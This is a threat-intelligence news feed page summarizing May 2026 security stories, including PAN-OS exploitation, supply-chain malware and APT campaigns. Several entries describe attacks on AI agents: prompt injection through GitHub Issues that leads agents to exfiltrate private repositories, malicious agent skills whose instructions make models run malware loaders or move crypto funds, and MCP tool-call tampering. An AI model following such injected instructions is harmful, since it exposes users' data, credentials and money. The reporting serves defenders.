Breaking News
New and updated threat intelligence stories from the last 24 hours, tracked and analyzed by Mallory.
New
Stories created in the last 24 hours
Active Exploitation of PAN-OS Captive Portal Flaw Gives Attackers Root on Firewalls
9
Palo Alto Networks disclosed **CVE-2026-0300**, a critical buffer overflow in the PAN-OS **User-ID Authentication Portal** (also called the Captive Portal) that is being exploited in the wild to achieve unauthenticated remote code execution with **root privileges**. The flaw is an out-of-bounds write triggered by specially crafted packets and affects exposed **PA-Series** and **VM-Series** firewalls running multiple PAN-OS 10.2, 11.1, 11.2, and 12.1 versions. Palo Alto assigned the issue a **CVSS 9.3** when the portal is reachable from the public internet or other untrusted networks, and **8.7** when access is limited to trusted internal IP addresses. The company said observed attacks have focused on Authentication Portal instances exposed to untrusted IP addresses, while **Prisma Access**, **Cloud NGFW**, and **Panorama** are not affected. At disclosure, fixes were not yet broadly available, with patch releases scheduled to begin in mid-May and continue through late May 2026. Palo Alto urged customers to immediately restrict portal access to trusted zones or internal IPs, or disable the Authentication Portal if it is not required, and said a **Threat Prevention Signature** for PAN-OS 11.1 and later was released as an added mitigation layer.
- May 6, 2026Palo Alto announces patch rollout schedule for affected PAN-OS versions
- May 6, 2026Palo Alto discloses CVE-2026-0300 under active exploitation
Trojanized DAEMON Tools Installers Used in Supply Chain Malware Attack
6
Official Windows installers for **DAEMON Tools** were compromised in a supply chain attack, with malicious versions distributed from the vendor’s legitimate website beginning on April 8. Kaspersky said the trojanized installers affected **DAEMON Tools Lite** versions `12.5.0.2421` through `12.5.0.2434`, were signed with valid AVB Disc Soft certificates, and implanted a staged backdoor that contacted the typosquatted command-and-control domain `env-check.daemontools[.]cc`. TechCrunch reported that an independently downloaded installer also appeared to contain the backdoor when scanned, while Disc Soft said it was investigating and taking remediation steps. Researchers observed thousands of infection attempts across more than 100 countries, but the attackers appear to have selectively escalated only a small number of victims in **Russia, Belarus, and Thailand**. Follow-on activity targeted organizations in the **government, scientific, manufacturing, and retail** sectors and included additional payloads such as an information stealer, an in-memory backdoor using **RC4**, and a more advanced **QUIC RAT**. Kaspersky said Chinese-language artifacts in the malware suggest a Chinese-speaking threat actor may be involved, though attribution remains unconfirmed, and urged defenders to hunt for related hashes, suspicious DAEMON Tools process activity, and communications with `env-check.daemontools[.]cc` and `38.180.107[.]76`.
- May 5, 2026Disc Soft acknowledges report and starts remediation
- May 5, 2026Kaspersky discovers active DAEMON Tools supply chain attack
Silver Fox Phishing Campaign Delivers ValleyRAT and New ABCDoor Backdoor
3
The China-linked threat group **Silver Fox** ran a phishing campaign that impersonated tax authorities in India and Russia to infect organizations with **ValleyRAT** and a newly documented Python backdoor, **ABCDoor**. Researchers said the activity began with fake tax notices sent as PDF attachments that directed victims to download a malicious archive. That archive contained a modified Rust-based loader, **RustSL**, which used geofencing, environment checks, stealth features, and persistence mechanisms before deploying ValleyRAT and then ABCDoor. More than 1,600 malicious emails were observed between early January and early February 2026, with victims spanning the industrial, consulting, retail, and transportation sectors. Analysis tied ABCDoor to Silver Fox’s toolkit since at least late 2024, with confirmed operational use starting in early 2025. On infected Windows systems, the malware established persistence through the **Run** registry key and a scheduled task named **`AppClient`**, concealed files under **`C:\ProgramData\Tailscale`**, and abused **`pythonw.exe`** and **`ffmpeg.exe`** to blend in while enabling surveillance, remote interaction, module execution, command-and-control, and data exfiltration. Researchers also identified a new ValleyRAT plugin that acted as a loader for ABCDoor, showing the group is expanding a malware chain built for covert access and follow-on control.
- May 5, 2026Researchers disclose Silver Fox's new ABCDoor malware
- May 5, 2026Cisco Talos publicly attributes government intrusions to UAT-8302
MuddyWater Disguised Espionage Intrusion as Chaos Ransomware Attack
2
Rapid7 assessed with moderate confidence that an intrusion initially presented as a **Chaos ransomware** incident was in fact a false-flag operation by the Iranian MOIS-linked group **MuddyWater** (also tracked as Seedworm). The attackers reportedly used **Microsoft Teams** social engineering, screen sharing, credential theft, and **MFA** manipulation to gain access, then deployed legitimate remote administration tools including **AnyDesk** and **DWAgent** to maintain persistence and move deeper into the environment, including toward a domain controller. Researchers said the operation diverged from a typical ransomware playbook because it emphasized long-term access, internal footholds, and data theft over disruptive encryption for profit. Rapid7 linked the activity to MuddyWater through overlapping infrastructure such as `moonzonet[.]com`, tradecraft consistent with prior operations, and use of the revoked **"Donald Gay"** code-signing certificate previously tied to MuddyWater malware including Stagecomp and Darkcomp. The intrusion also used a loader, `ms_upd.exe`, to deploy a custom backdoor, `Game.exe`, which masqueraded as a Microsoft WebView2 sample application and enabled command execution, file operations, and persistent shell access. Researchers concluded that the ransomware branding and extortion behavior were likely intended to delay attribution and mask espionage or prepositioning objectives, continuing a pattern in which MuddyWater uses criminal ransomware themes as operational cover.
- May 6, 2026Rapid7 publishes analysis attributing the operation to MuddyWater
- Jan 1, 2026Attackers deploy ms_upd.exe and Game.exe during the intrusion
Attackers Abuse Amazon SES to Send Phishing That Passes Email Authentication
2
Kaspersky reported a rise in phishing campaigns that abuse Amazon Simple Email Service (**SES**) to deliver convincing messages through trusted cloud infrastructure. The activity is believed to be fueled by exposed AWS Identity and Access Management (**IAM**) access keys discovered in public GitHub repositories, `.env` files, Docker images, backups, and public S3 buckets. After validating stolen credentials—reportedly with automated secret-scanning and access-checking workflows—attackers use SES to send bulk phishing emails that can pass **SPF**, **DKIM**, and **DMARC**, reducing the effectiveness of reputation-based filtering. Observed campaigns included fake **DocuSign** notifications that redirected targets to AWS-hosted credential-harvesting pages, as well as more advanced business email compromise attempts using fabricated email threads and fake invoices. Researchers urged organizations to enforce least-privilege IAM permissions, enable MFA, rotate keys regularly, apply IP-based access restrictions, and strengthen encryption controls around secrets. Amazon said it provides guidance for exposed credentials, responds to abuse reports, and directs suspected misuse of AWS resources to **AWS Trust & Safety**.
- May 4, 2026Amazon issues response and abuse-reporting guidance
- May 4, 2026Researchers link SES abuse to exposed AWS IAM credentials
Oracle Shifts to Monthly Critical Security Patch Updates
2
Oracle said it will replace its quarterly security patching model with **monthly Critical Security Patch Updates** for ERP, database, and other software products, citing the faster pace of **AI-enabled vulnerability discovery**. The company said the new cadence is intended to shorten exposure windows as attackers and researchers use AI to identify software flaws more quickly. The first monthly release is scheduled for **May 28**, after which Oracle plans to move to a regular **third-Tuesday** schedule each month. Reported upcoming dates include **June 16, July 21, and August 18**. The move brings Oracle closer to the monthly patching approach already used by major software vendors including **Microsoft, SAP, and Adobe**, though those vendors typically release updates on the **second Tuesday** of the month.
- May 28, 2026Oracle schedules first monthly Critical Security Patch Update
- May 5, 2026Oracle announces shift from quarterly to monthly security patching
Security Flaws in Embodied AI Robots Raise Cyber-Physical Risk
1
Researchers warned that **embodied AI systems**—including humanoid and quadruped robots—are entering commercial, industrial, military, and critical infrastructure environments with weak security controls that could enable both digital compromise and real-world harm. The report highlighted documented issues in commercially available robots, particularly **Unitree** platforms, including an undocumented **CloudSail** remote-access backdoor, exposed APIs that could disclose device locations and camera feeds, Bluetooth and Wi-Fi provisioning weaknesses that could allow root access, and telemetry sent to external servers in China. The findings describe robots as high-risk **cyber-physical endpoints** because they combine cameras, microphones, radios, cloud connectivity, and physical actuation in a single platform. Researchers said those characteristics could allow wireless propagation, fleet-wide compromise, and even "physical botnets," while **vision-language model** prompt injection could manipulate robot behavior through physical-world inputs. The report urged organizations deploying robots in areas such as manufacturing, nuclear decommissioning, and military operations to strengthen procurement reviews, segment robot networks, monitor vulnerabilities, and prepare continuity plans before insecure architectures become embedded at scale.
- May 5, 2026Recorded Future highlights systemic security risks in embodied AI robots
Recently Updated
Stories with a meaningful timeline update in the last 24 hours
CopyFail Linux Kernel AEAD Flaw Enables Local Privilege Escalation
123
Researchers disclosed **CVE-2026-31431**, dubbed **CopyFail**, a high-severity local privilege-escalation flaw in the Linux kernel's crypto subsystem affecting the `algif_aead` module through the `AF_ALG` socket interface. The bug was introduced in Linux `4.14` by commit `72548b093ee3`, which added in-place AEAD handling in `algif_aead.c`; because source and destination buffers came from different memory mappings, the change created a path to memory corruption. The oss-sec disclosure said an unprivileged local attacker could exploit the flaw with a working Python proof of concept to gain a controlled page-cache write primitive against readable files. That primitive could let attackers tamper with read-only files or `setuid` executables, potentially leading to privilege escalation or code execution. The issue has been fixed by reverting to out-of-place operation while preserving associated-data copying, with patches released in stable kernels `6.18.22`, `6.19.12`, and `7.0`. Public advisories rate the flaw **CVSS 7.8** (`AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) and recommend applying the stable kernel updates, restricting access to `AF_ALG`, and disabling or unloading the `algif_aead` module where it is not required.
- May 5, 2026AF_ALG is reportedly deprecated and patch submitted to remove zero-copy support
- May 3, 2026oss-sec warns namespaces are weak isolation for AF_ALG and similar socket families
Critical cPanel & WHM Authentication Flaw Exposes Servers to Unauthorized Access
53
cPanel disclosed a **critical login authentication vulnerability** in **cPanel & WHM** that can allow **unauthorized access** to affected servers, and released fixes for supported versions on April 28, 2026. Public technical details remain limited and no `CVE` had been assigned at the time of disclosure, but changelog references tied the issue to **session loading and saving** under `CPANEL-52908`. The flaw affects multiple supported release tiers, and cPanel urged administrators to upgrade immediately. Patched builds were issued for versions **110, 118, 126, 132, 134, and 136**, while unsupported or end-of-life deployments are also considered likely at risk. The exposure is significant because **WHM** is used for server administration and **cPanel** manages individual hosting accounts, meaning successful exploitation could compromise both administrative and tenant access paths. Security teams were advised to rapidly inventory internet-facing cPanel assets, identify impacted versions, and prioritize emergency remediation across hosted environments.
- May 4, 2026Shadowserver reports 44,000 likely compromised cPanel/WHM IPs
- May 2, 2026Unknown actor targets MSP and hosting networks with CVE-2026-41940
AI Governance and Risk Management Initiatives
46
Organizations and researchers are advancing **AI governance** and **risk management** efforts through new institutional programs, policy engagement, and conceptual frameworks aimed at addressing the societal, legal, and cybersecurity implications of increasingly capable AI systems. Anthropic announced the **Anthropic Institute**, consolidating teams focused on frontier model red teaming, societal impacts, and economic research, while also expanding its public policy presence to engage lawmakers on AI-related regulation and infrastructure issues. Broader discussion in the other materials reflects the same general theme of embedding accountability into AI systems and developing governance strategies for AI risk. A forthcoming book by Sabira Arefin argues that ethics should be engineered into AI architecture rather than treated as an abstract principle, while the Knight First Amendment Institute article examines competing approaches to AI risk governance, including model-centric controls, testing, evaluation, and policy frameworks such as the **EU AI Act** and UN trustworthy AI initiatives. The material is **not fluff** overall because it contains substantive policy and governance analysis, although the book announcement is primarily promotional.
- May 5, 2026Trump administration weighs executive order for formal AI model review
- May 5, 2026Major U.S. AI labs agree to pre-release CAISI model testing
U.S. Regulators Warn Major Banks About Anthropic’s Mythos Cyber AI
35
U.S. Treasury Secretary Scott Bessent and Federal Reserve Chair Jerome Powell reportedly convened an urgent meeting with chief executives from major Wall Street banks to warn that Anthropic’s new AI model, **Mythos**, could accelerate the discovery and exploitation of previously unknown software flaws. The discussions included leaders from systemically important institutions such as Citigroup, Morgan Stanley, Bank of America, Wells Fargo, and Goldman Sachs, reflecting concern that advanced offensive cyber capabilities could create not only enterprise security problems but broader financial-stability risks. Anthropic has described Mythos as a model built for cybersecurity software engineering that can identify vulnerabilities across major operating systems, web browsers, and other software, and in some cases help assemble sophisticated exploits. The company did not broadly release the model, instead limiting access under **Project Glasswing** to roughly 40 technology firms including Microsoft and Google, while briefing U.S. officials and industry stakeholders on its risks and defensive uses. Officials are also weighing the implications for crypto and DeFi platforms, where low-cost, real-time zero-day discovery could increase the threat of disruptive attacks.
- May 6, 2026SEBI issues Mythos cyber alert for India's securities sector
- Apr 28, 2026Australian banks move to address Mythos-linked cyber risks
Instructure discloses cyber incident affecting Canvas services
29
Instructure, the U.S. education technology company behind the **Canvas** learning platform, disclosed that it recently suffered a cybersecurity incident involving a criminal threat actor and has engaged outside forensic experts to investigate the scope and impact. The company said it is still determining what systems or data were affected and has not yet confirmed whether service disruptions beginning May 1—including maintenance affecting **Canvas Data 2**, **Canvas Beta**, and tools dependent on API keys—are directly tied to the incident. The disclosure comes as education technology providers face sustained targeting because they hold large volumes of student and teacher information. Reporting around the incident notes that Instructure had already disclosed a separate **Salesforce-related** breach in September 2025 linked to social engineering, while external leak-site style listings have also associated the company with **ShinyHunters** claims that remain unverified. The latest incident also follows other major school technology breaches, including **PowerSchool** and **Infinite Campus**, underscoring continued pressure on the sector.
- May 5, 2026Colorado Boulder, Rutgers, and Tilburg acknowledge Canvas incident
- May 5, 2026ShinyHunters shares sample Instructure data with TechCrunch
Malicious code and prompt-injection attacks targeting developers and AI-agent ecosystems
24
Multiple reports describe **social-engineering and supply-chain style attacks** that trick developers or AI-agent users into executing attacker-controlled instructions. North Korean operators have been linked to the **“Contagious Interview”** campaign, in which fake recruiter personas lure software developers into running “technical interview” projects that deploy malware such as **BeaverTail** and **OtterCookie** for credential theft and remote access; GitLab reported banning **131 related accounts** in 2025, with many repos using **hidden loaders** that fetched payloads from third-party services (e.g., *Vercel*) rather than hosting malware directly. Separately, OpenGuardrails reported a campaign on *ClawHub* (an OpenClaw AI agent “skills” repository) where attackers posted **malicious troubleshooting comments** containing Base64-encoded commands that download a loader from `91[.]92[.]242[.]30`, remove macOS quarantine attributes, and install **Atomic macOS (AMOS) infostealer**—a delivery method that can evade package-focused scanning because the payload is in comments, not the skill artifact. Research and incident writeups also highlight how **indirect prompt injection** and **malicious open-source packages** can compromise developer environments. NSFOCUS summarized a GitHub **MCP cross-repository data leak** scenario where attacker-injected instructions in public Issues could cause locally running AI agents to exfiltrate private repo data when agents act with broad GitHub permissions, and cited a similar hidden-command issue affecting an AI browser’s page summarization workflow. JFrog reported malicious npm packages (e.g., `eslint-verify-plugin`, `duer-js`) delivering multi-stage payloads including a **macOS RAT** (Mythic/Apfell) and a Windows infostealer, reinforcing ongoing risk from poisoned dependencies. In contrast, a DFIR case study on **CVE-2023-46604** exploitation of Apache ActiveMQ leading to **LockBit**-style ransomware, and a Medium post on recon/content-discovery techniques, are separate topics and not part of the AI-agent/developer social-engineering thread.
- May 1, 2026Researchers report Contagious Interview shift to malicious Git hooks
- Apr 29, 2026Researchers expose Lazarus operator workstations via self-ingested exfiltration data
Iran-Linked Hybrid Threats to Middle East Digital and Maritime Infrastructure
20
Escalation in the **Iran-US-Israel conflict** is disrupting regional digital and communications infrastructure through both direct threats and indirect operational impacts. Iran-linked activity has reportedly expanded from military retaliation rhetoric to threats against major U.S. technology companies' facilities in the Middle East, including sites associated with **Microsoft, Amazon, Google, Oracle, IBM, and Nvidia**, while earlier attacks were said to have caused outages at **AWS** datacenters in the UAE and Bahrain. In parallel, maritime traffic near the **Strait of Hormuz** has experienced anomalies consistent with **GNSS spoofing** and other electronic warfare techniques, with vessels reporting false positions and receiving radio warnings that could be used to shape shipping behavior without a formal blockade. The same regional instability is also affecting subsea connectivity projects. Meta's **2Africa** cable build has been delayed after **Alcatel Submarine Networks** declared force majeure and said it could no longer safely operate in the Persian Gulf, leaving the *Pearls* segment incomplete despite most cable having already been laid. Together, the reporting indicates a broader pattern in which conflict around Iran is creating cyber-physical risk across **cloud infrastructure, maritime navigation, and undersea communications**, increasing the likelihood of service disruption, delayed repairs, higher operating costs, and reduced confidence in critical regional infrastructure.
- May 5, 2026Mass GPS jamming and dark vessel buildup hit Fujairah-Hormuz corridor
- May 4, 2026U.S. launches Project Freedom to guide neutral shipping in Hormuz
Debate Over Kids Online Safety Act and Age-Verification Requirements for Minors
14
Policymakers in multiple jurisdictions are advancing **child online safety** rules that would restrict minors’ access to social media, “addictive” product features, and certain content (including pornography), increasing pressure on platforms to implement **age assurance/age verification** to determine users’ ages before allowing access. The Lawfare analysis highlights that while protecting children online is a widely shared goal, enforcing age-based restrictions at scale effectively requires collecting and validating age signals for *all* users—raising significant implementation, privacy, and governance challenges as governments consider measures such as the **Kids Online Safety Act (KOSA)**, the **Kids Off Social Media Act**, and the **App Store Accountability Act**.
- May 6, 2026UK age-gating expansion advances after Children’s Wellbeing bill clears Parliament
- May 6, 2026Utah age-verification law takes effect with VPN circumvention provisions
Multiple Linux Kernel Vulnerabilities Prompt dCERT Advisories
14
dCERT published two advisories, `2025-1332` and `2025-1527`, warning of **multiple vulnerabilities in the Linux kernel**. The notices indicate that separate sets of kernel flaws were significant enough to warrant dedicated advisories, underscoring continued security risk in one of the most widely deployed operating system components across servers, cloud infrastructure, appliances, and embedded systems. While no public synopsis was included in the referenced advisories, the alerts point organizations to review affected kernel versions, assess exposure across Linux-based assets, and apply vendor-provided updates or mitigations. Because kernel vulnerabilities can affect core system security boundaries and stability, unpatched systems may face elevated risk depending on the specific flaws and deployment context.
- May 6, 2026dCERT publishes Linux Kernel multiple-vulnerability advisory 2026-1361
- Apr 28, 2026dCERT publishes Linux Kernel multiple-vulnerability advisory 2026-1273
+ 29 more recently updated
12Zerion and KelpDAO link security incidents to DPRK TraderTraitor activityZerion published a **security incident post-mortem**, and LayerZero later issued a **KelpDAO incident statement**, with both incidents being publicly tied in threat-intelligence discussion to **DPRK** activity. Social-media reporting around the disclosures specifically associated the KelpDAO case with **TraderTraitor**, the North Korean cluster known for targeting cryptocurrency and Web3 organizations through social engineering and wallet compromise. The available references do not provide technical indicators, loss figures, or a detailed attack chain, but they place both disclosures in the context of crypto-focused intrusions attributed to North Korean operators. For CISOs in digital-asset, DeFi, and wallet ecosystems, the incidents reinforce the ongoing risk from DPRK-linked campaigns that exploit trusted workflows, third-party relationships, and user-facing transaction processes to gain access and move funds.KelpDAO publishes LayerZero bridge hack clarificationMay 6, 2026
12Growing Use of LLMs to Automate Offensive Security and Threat Intelligence WorkflowsMultiple security researchers and vendors reported rapid adoption of **LLM-driven automation** across both offensive and defensive security workflows, with a focus on turning traditionally manual, expert-led tasks into semi- or fully-automated pipelines. Black Lantern Security described how “agentic” LLM tooling is being positioned as a terminal-native partner for offensive security engineers, potentially orchestrating common testing stacks and accelerating repetitive penetration testing activities, while also introducing new operational and safety challenges. On the defensive side, SentinelOne detailed using LLMs to extract and contextualize data from narrative **cyber threat intelligence (CTI)** reporting, converting unstructured prose into structured entities/relationships (e.g., IOCs and inferred links) for downstream detection and response workflows, and discussed trade-offs versus non-LLM pattern-matching approaches. Separately, an independent researcher described using LLMs for **vulnerability research** end-to-end—claiming discovery of multiple real-world vulnerabilities without manual source review—by applying AI-assisted techniques such as differential and grammar-based fuzzing and automated harness generation against widely used projects (e.g., Parse Server, HonoJS, ElysiaJS).Include Security says AI agents reshaped BSidesSF 2026 CTF resultsApr 23, 2026
12U.S. Defense AI Policy Disputes Over Guardrails and Autonomous WeaponsThe most coherent story is a widening **U.S. defense AI policy conflict** over how far military and national-security agencies should push artificial intelligence into weapons and related systems while reducing safeguards. Reporting on the Pentagon’s posture says the Defense Department is seeking major funding for autonomous systems and accelerating battlefield AI adoption even as experts warn that oversight, operational testing, and civilian-harm mitigation mechanisms are being weakened. A separate court filing shows that dispute has moved into litigation: the Trump administration is defending the Pentagon’s decision to blacklist **Anthropic** after the company refused to remove restrictions on use of its models for **autonomous weapons** or domestic surveillance, framing the issue as a supply-chain and contracting matter rather than retaliation. Other references are adjacent to the same broad policy debate but do not describe the same specific event. One is a discussion of **AI and nuclear command-and-control risks**, including U.S.-China agreement that AI should not decide nuclear use; it is relevant as background on military AI guardrails, but it is not about the Pentagon funding push or the Anthropic lawsuit itself. Another covers a **counter-drone laser** safety test at White Sands involving FAA coordination and automated shutdown behavior; despite its defense-technology focus, it concerns directed-energy testing rather than the policy and legal fight over AI guardrails, and should be excluded from the main story.Trump administration drafts policy to limit vendor restrictions on government AI useMay 5, 2026
11Anthropic Mythos AI Tool Spurs Cybersecurity Alarm in Healthcare and GovernmentAnthropic’s **Mythos** vulnerability research model has drawn scrutiny over its potential to dramatically compress exploit development timelines, raising fears that attackers could move from discovery to weaponization in hours or minutes instead of days or months. Healthcare security experts warned that hospitals are particularly exposed because they depend on legacy clinical systems, connected medical devices, and operational technology that are difficult to patch and often lack modern protections. The concern comes as the healthcare and public health sector reportedly endured **460 ransomware attacks in 2025**, the highest total among critical infrastructure sectors in the FBI’s IC3 reporting, intensifying worries about patient safety, service outages, and faster coordinated ransomware campaigns. At the same time, officials and industry leaders are weighing whether Mythos-class tools could strengthen defense by improving anomaly detection, vulnerability prioritization, code and configuration review, legacy device testing, and incident response. In Washington, the Office of Management and Budget said it is **not** currently changing policy to give federal agencies access to Mythos, even as the White House examines the model’s cyber implications and coordinates with providers, industry, and the intelligence community on guardrails for any possible modified release. The debate is unfolding alongside broader friction between Anthropic and the administration, including litigation tied to a Pentagon supply chain risk designation and an order directing agencies to remove Anthropic tools from federal networks.European MEPs urge stronger EU cyber defenses after Mythos concernsMay 5, 2026
11Vimeo links customer data exposure to Anodot supply-chain breachVimeo said a security incident exposed some user and customer data through a compromise at third-party analytics vendor **Anodot**, and linked the activity to the **ShinyHunters** cybercriminal ecosystem. According to Vimeo, the accessed information primarily included technical data, video titles and metadata, and in some cases customer email addresses; the company said video content, user login credentials, and payment card data were **not** accessed. ShinyHunters subsequently added Vimeo to its leak site and threatened to publish the data if a ransom was not paid. Vimeo said it disabled Anodot credentials, removed the Anodot integration, engaged external security experts, and notified law enforcement while continuing its investigation. The company said its services were not disrupted, and reporting indicates the incident may be part of a broader **supply-chain compromise** involving Anodot that could affect multiple customers, consistent with recent ShinyHunters operations that have relied heavily on voice and email phishing to gain access rather than exploiting software vulnerabilities.ShinyHunters leaks Vimeo data; HIBP counts 119,200 exposed emailsMay 5, 2026
10ScarCruft Compromised sqgame.net to Deliver BirdCall Spyware on Android and WindowsNorth Korea-linked **ScarCruft** (also tracked as **APT37** and **Reaper**) compromised the gaming platform `sqgame[.]net` to distribute trojanized software carrying its **BirdCall** backdoor, according to reporting based on ESET research. The operation targeted users tied to the Yanbian Korean Autonomous Prefecture in China, a region associated with North Korean defector transit, and likely focused on defectors, activists, and related communities. Researchers said the campaign appears to have begun in late 2024, with attackers likely breaching the site’s web server and repackaging legitimate Android game APKs rather than stealing source code. The malicious Android apps deployed a mobile variant of BirdCall capable of stealing contacts, SMS messages, call logs, files, media, and private keys, while also taking screenshots and recording ambient audio. Reporting also said ScarCruft briefly trojanized a Windows desktop client update component: a malicious `mono.dll` fetched **RokRAT**, which then installed the Windows BirdCall payload. BirdCall is described as an evolution of RokRAT and supports surveillance features including keystroke logging, clipboard theft, shell execution, and screenshot capture on Windows, while its Android command-and-control traffic blended into normal network activity and could use cloud services such as **Zoho WorkDrive**, **pCloud**, and **Yandex Disk**.Cisco Talos discloses UAT-8302 and publishes IOCsMay 5, 2026
9Weaver E-cology Flaws Expose Servers to Unauthenticated RCE and File ReadWeaver (Fanwei) **E-cology** deployments are affected by two high-severity vulnerabilities that allow unauthenticated attackers to compromise exposed servers. **`CVE-2026-22679`** impacts E-cology **10.0** versions prior to **20260312** and enables remote code execution through the `/papi/esearch/data/devops/dubboApi/debug/method` endpoint, where attacker-controlled `interfaceName` and `methodName` POST parameters can abuse exposed debug functionality to run arbitrary commands. The issue is classified as **CWE-306** and carries high impact across confidentiality, integrity, and availability, with exploitation observed in the wild by the Shadowserver Foundation. A second flaw, **`CVE-2022-50992`**, affects E-cology **9.5** versions prior to **10.52** and allows unauthenticated arbitrary file reads through the **`XmlRpcServlet`** XML-RPC interface. Attackers can supply file paths to the `WorkflowService.getAttachment` and `WorkflowService.LoadTemplateProp` methods to retrieve sensitive files from the server, including configuration data and database credentials. The vulnerability is mapped to **CWE-22**, and Shadowserver reported exploitation evidence dating back to 2022, underscoring continued exposure risk for internet-facing E-cology systems that remain unpatched.VulnCheck receives disclosure for Weaver E-cology 9.5 file-read flawApr 30, 2026
9Malicious AI Agent Skills Abused for Crypto Theft and macOS AMOS DeliveryResearchers reported multiple campaigns abusing *AI agent “skills”* as a new supply-chain-like initial access vector. In one case, a malicious ClawHub skill (`bob-p2p`) masqueraded as a decentralized API marketplace and was promoted via the AI-agent social platform *Moltbook*; once installed, it caused agents to retain **plaintext Solana private keys** and execute transactions that bought worthless `$BOB` tokens while routing value to attacker-controlled infrastructure. Staiker researchers and analyst Dan Regalado highlighted that agent-to-agent collaboration, shared workflows, and dependency chains can enable **lateral movement without direct human interaction**, making the technique repeatable and scalable beyond crypto-wallet theft. Separately, Trend Micro described a shift in **Atomic macOS Stealer (AMOS)** distribution from cracked software to **malicious OpenClaw skills** hosted across ClawHub, SkillsMP, and GitHub. The campaign used seemingly benign `SKILL.md` instructions to trick models/users into installing a fake prerequisite (“OpenClawCLI”) from an external site; if followed, the workflow fetched and executed a **Base64-encoded command** that dropped a **Mach-O universal binary** (Intel and Apple Silicon). Trend Micro reported 39 malicious skills uploaded across repositories and stated that more than **2,200** malicious skills were ultimately found on GitHub, with AMOS targeting credentials, browser data, crypto wallets, Telegram data, VPN profiles, Apple Keychain items, and common user folders—underscoring that AI-agent ecosystems are becoming a practical malware delivery and data-theft channel.Zscaler details DeepSeek-Claw skill delivering Remcos RAT and GhostLoaderMay 5, 2026
9Critical Android adbd TLS Bypass Enables Zero-Click Remote Shell AccessGoogle disclosed and patched **CVE-2026-0073**, a critical flaw in Android's `adbd` component that can let a nearby attacker bypass wireless ADB mutual authentication and gain code execution as the **shell** user with **no user interaction**. The bug is a logic error in `adbd_tls_verify_cert` in `auth.cpp`, where certificate key comparisons can incorrectly succeed, allowing an attacker to establish an authenticated ADB-over-TCP session without valid pairing credentials. Public reporting says exploitation is proximal or adjacent, typically requiring access to the same local network or physical proximity, and is most relevant when **wireless debugging** is enabled. The issue affects **Android 14, 15, 16, and 16-qpr2** and is addressed by the **2026-05-01** Android security patch level, with fixes also being distributed through **AOSP** and potentially **Google Play system updates** because `adbd` is part of Project Mainline. Google said Android partners were notified at least a month in advance, while national and regional advisories including dCERT and the Canadian Centre for Cyber Security urged organizations and users to apply updates. Security researchers also noted that devices with exposed ADB-over-TCP services, including those reachable on port `5555`, may face additional risk if they hit the vulnerable authentication path.National CERTs issue advisories urging Android updatesMay 5, 2026
9Email-borne scams abuse trusted SaaS infrastructure and authentication to bypass defensesThreat actors are increasingly abusing **trusted SaaS platforms and email authentication** to deliver high-conviction scam lures that evade traditional filtering. Trend Micro reported a targeted spam operation that weaponizes **Atlassian Cloud** features to send messages that pass common checks (e.g., **SPF/DKIM**) due to the strong reputation of SaaS sender domains; the campaign is multilingual and aims to redirect government and corporate recipients to **fraudulent investment** landing pages using **Keitaro TDS**, with attackers creating multiple Atlassian instances for resilience and scale. Separately, Forcepoint X-Labs described phishing emails impersonating the **US Social Security Administration** that deliver a `.cmd` script to weaken Windows defenses (including disabling **SmartScreen**, removing **Mark-of-the-Web**, and using **Alternate Data Streams**) before silently installing **ConnectWise ScreenConnect** as a remote-access backdoor (including a hardcoded callback configuration). Related research highlighted **DKIM replay attacks**, where adversaries forward legitimate, DKIM-signed vendor emails (e.g., PayPal/DocuSign-style invoices and dispute notices) so the unchanged content continues to validate and can pass **DMARC**, increasing inbox placement and user trust for follow-on social engineering.Researchers report Amazon SES abuse for phishing and BEC campaignsMay 5, 2026
9Model Context Protocol (MCP) Security Risks From Untrusted Tool Servers and Verifiability GapsSecurity researchers warned that the *Model Context Protocol (MCP)*—used to let AI assistants connect to local tools and enterprise SaaS data—creates a significant attack surface when organizations install or authorize MCP “servers” and tool integrations. Praetorian highlighted that **locally hosted MCP servers run with the user’s privileges** and can therefore execute arbitrary commands, access local files, install malware, and exfiltrate data while masquerading as legitimate productivity tooling; it also described **“MCP server chaining,”** where a malicious local MCP server abuses data and actions flowing through a trusted remote integration (e.g., Slack/Google Drive) without needing to compromise the official provider. Separately, Gopher Security emphasized a **trust and auditability gap** in MCP deployments: standard logging for remote tool execution can be incomplete or tampered with, and organizations often cannot prove what code ran or what parameters were used inside a remote “black box” execution environment. The post described “puppet”/interception-style scenarios where an attacker could alter an MCP request (e.g., changing tool-call parameters to trigger data exfiltration or unauthorized actions) while returning plausible “success” responses, and proposed cryptographic approaches (e.g., **zero-knowledge proofs**) to make MCP tool execution verifiable rather than relying on mutable logs.Akamai reframes MCP servers as directly exposed attack surfacesMay 5, 2026
8Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changesPush Security reported an **“InstallFix” malvertising campaign** targeting developers searching for Anthropic’s *Claude Code* CLI. Attackers clone the legitimate installation page on lookalike domains and buy **Google Search ads** so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the **copy‑paste install one‑liners** are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the **Amatera Stealer**, with macOS users likely targeted by similar info-stealing malware. Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using *Claude Code* to run **Terraform** changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the **deletion of production components**, including a database and recovery snapshots—wiping roughly **2.5 years of records**. Together, the reports underscore two distinct but compounding risks around AI coding agents: **supply-chain style social engineering** via fake install instructions and **high-impact misexecution** when AI-driven automation is allowed to operate with destructive permissions in production environments.Gurucul publishes IOCs and detection guidance for InstallFix Claude Code campaignMay 6, 2026
8dCERT Flags vLLM Flaws and Spring Security Authentication BypassdCERT published two security advisories covering separate software risks: **multiple vulnerabilities in `vllm`** and a **VMware Tanzu Spring Security flaw that can bypass security measures**. The `vllm` advisory identifies more than one issue affecting the large language model serving software, while the Spring Security advisory warns that affected deployments may allow protections to be circumvented. The notices indicate that organizations using either product should review the relevant dCERT advisories, determine exposure in their environments, and prioritize remediation. The Spring Security issue is especially significant for internet-facing or authentication-dependent applications because a bypass in security controls can undermine access restrictions, while the `vllm` findings raise concern for AI infrastructure operators running vulnerable versions in production or shared environments.dCERT publishes vLLM denial-of-service vulnerability advisoryMay 6, 2026
